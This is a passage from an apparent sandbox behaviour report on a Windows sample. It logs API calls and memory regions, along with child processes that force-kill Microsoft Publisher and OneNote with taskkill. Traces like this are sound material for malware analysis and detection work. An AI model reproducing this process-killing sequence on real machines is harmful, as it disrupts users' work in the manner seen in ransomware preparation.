dwProcessId=0x960, dwThreadId=0x868)) returned 1 [0210.325] CloseHandle (hObject=0x98) returned 1 [0210.325] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0210.325] GetProcessHeap () returned 0x490000 [0210.326] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x499e48) returned 1 [0210.326] GetEnvironmentStringsW () returned 0x499e48* [0210.326] GetProcessHeap () returned 0x490000 [0210.326] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa76) returned 0x49bd48 [0210.326] FreeEnvironmentStringsA (penv="=") returned 1 [0210.326] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0211.535] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0211.535] CloseHandle (hObject=0x9c) returned 1 [0211.536] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0211.536] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0211.544] GetProcessHeap () returned 0x490000 [0211.544] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49bd48) returned 1 [0211.544] GetEnvironmentStringsW () returned 0x49b260* [0211.544] GetProcessHeap () returned 0x490000 [0211.544] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa9c) returned 0x49bd08 [0211.544] FreeEnvironmentStringsA (penv="=") returned 1 [0211.544] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0211.544] GetProcessHeap () returned 0x490000 [0211.545] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49bd08) returned 1 [0211.545] GetEnvironmentStringsW () returned 0x49b260* [0211.545] GetProcessHeap () returned 0x490000 [0211.545] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa9c) returned 0x49bd08 [0211.546] FreeEnvironmentStringsA (penv="=") returned 1 [0211.546] GetProcessHeap () returned 0x490000 [0211.546] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49b210) returned 1 [0211.546] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0211.546] _get_osfhandle (_FileHandle=1) returned 0x140 [0211.546] SetConsoleMode (hConsoleHandle=0x140, dwMode=0x0) returned 0 [0211.546] _get_osfhandle (_FileHandle=1) returned 0x140 [0211.546] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0211.546] _get_osfhandle (_FileHandle=0) returned 0x13c [0211.546] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0211.546] GetConsoleOutputCP () returned 0x1b5 [0211.550] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0211.550] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.552] exit (_Code=128) Thread: id = 340 os_tid = 0xecc Process: id = "64" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x1b2a9000" os_pid = "0x960" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "63" os_parent_pid = "0x344" cmd_line = "taskkill /f /im mspub.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4668 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4669 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4670 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 4671 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 4672 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 4673 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 4674 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 4675 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 4676 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4677 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4678 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4679 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4680 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 4681 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4682 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 4683 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4684 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 4685 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 4686 start_va = 0x4580000 end_va = 0x458ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 4687 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4688 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4689 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4690 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4691 start_va = 0x4400000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 4692 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4693 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4694 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4695 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4696 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4697 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4698 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4699 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4700 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 4701 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 4702 start_va = 0x4480000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 4703 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4704 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4705 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4706 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4707 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4708 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4709 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4710 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4711 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4712 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4713 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4714 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4715 start_va = 0x6cd60000 end_va = 0x6cd9efff monitored = 0 entry_point = 0x6cd746c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4716 start_va = 0x6cbb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6cbdd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 4717 start_va = 0x6cb90000 end_va = 0x6cbabfff monitored = 0 entry_point = 0x6cb94720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 4718 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 4719 start_va = 0x6cac0000 end_va = 0x6cad5fff monitored = 0 entry_point = 0x6cac21d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 4720 start_va = 0x4590000 end_va = 0x468ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 4721 start_va = 0x4590000 end_va = 0x45b9fff monitored = 0 entry_point = 0x4595680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4722 start_va = 0x4680000 end_va = 0x468ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 4723 start_va = 0x4690000 end_va = 0x4817fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004690000" filename = "" Region: id = 4724 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4725 start_va = 0x4820000 end_va = 0x49a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004820000" filename = "" Region: id = 4726 start_va = 0x49b0000 end_va = 0x5daffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049b0000" filename = "" Region: id = 4727 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4728 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 4729 start_va = 0x4590000 end_va = 0x4594fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 4730 start_va = 0x45a0000 end_va = 0x45a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 4731 start_va = 0x45b0000 end_va = 0x45b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 4732 start_va = 0x5db0000 end_va = 0x60e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4733 start_va = 0x60f0000 end_va = 0x61d9fff monitored = 0 entry_point = 0x612d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4734 start_va = 0x45c0000 end_va = 0x45c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045c0000" filename = "" Region: id = 4735 start_va = 0x60f0000 end_va = 0x61cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 4736 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4737 start_va = 0x45d0000 end_va = 0x45d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045d0000" filename = "" Region: id = 4738 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4739 start_va = 0x45e0000 end_va = 0x45e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045e0000" filename = "" Region: id = 4740 start_va = 0x6cab0000 end_va = 0x6cabcfff monitored = 0 entry_point = 0x6cab3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4741 start_va = 0x6ca40000 end_va = 0x6caa6fff monitored = 0 entry_point = 0x6ca5b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4742 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4743 start_va = 0x6c9f0000 end_va = 0x6ca33fff monitored = 0 entry_point = 0x6ca0aaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 4744 start_va = 0x45f0000 end_va = 0x462ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045f0000" filename = "" Region: id = 4745 start_va = 0x4630000 end_va = 0x466ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 4746 start_va = 0x61d0000 end_va = 0x620ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061d0000" filename = "" Region: id = 4747 start_va = 0x6210000 end_va = 0x624ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006210000" filename = "" Region: id = 4748 start_va = 0x6250000 end_va = 0x628ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006250000" filename = "" Region: id = 4749 start_va = 0x6290000 end_va = 0x62cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006290000" filename = "" Region: id = 4750 start_va = 0x6c9d0000 end_va = 0x6c9e0fff monitored = 0 entry_point = 0x6c9d8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 4751 start_va = 0x6c910000 end_va = 0x6c9cefff monitored = 0 entry_point = 0x6c941e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 4753 start_va = 0x4670000 end_va = 0x4675fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004670000" filename = "" Thread: id = 341 os_tid = 0x868 Thread: id = 342 os_tid = 0xec8 Thread: id = 343 os_tid = 0xbd0 Thread: id = 344 os_tid = 0xac8 Thread: id = 345 os_tid = 0xe4c Process: id = "65" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2eb53000" os_pid = "0xe6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im onenote.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4755 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4756 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4757 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4758 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4759 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4760 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4761 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4762 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4763 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4764 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4765 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 4766 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4767 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4768 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4769 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4770 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 4771 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4772 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 4773 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4774 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4775 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4776 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4777 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4778 start_va = 0x480000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 4779 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4780 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4781 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4782 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4783 start_va = 0x580000 end_va = 0x63dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4784 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4785 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4786 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 4787 start_va = 0x740000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 4788 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4789 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4790 start_va = 0x810000 end_va = 0xb46fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 346 os_tid = 0xe40 [0211.927] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0211.927] __set_app_type (_Type=0x1) [0211.927] __p__fmode () returned 0x74974d6c 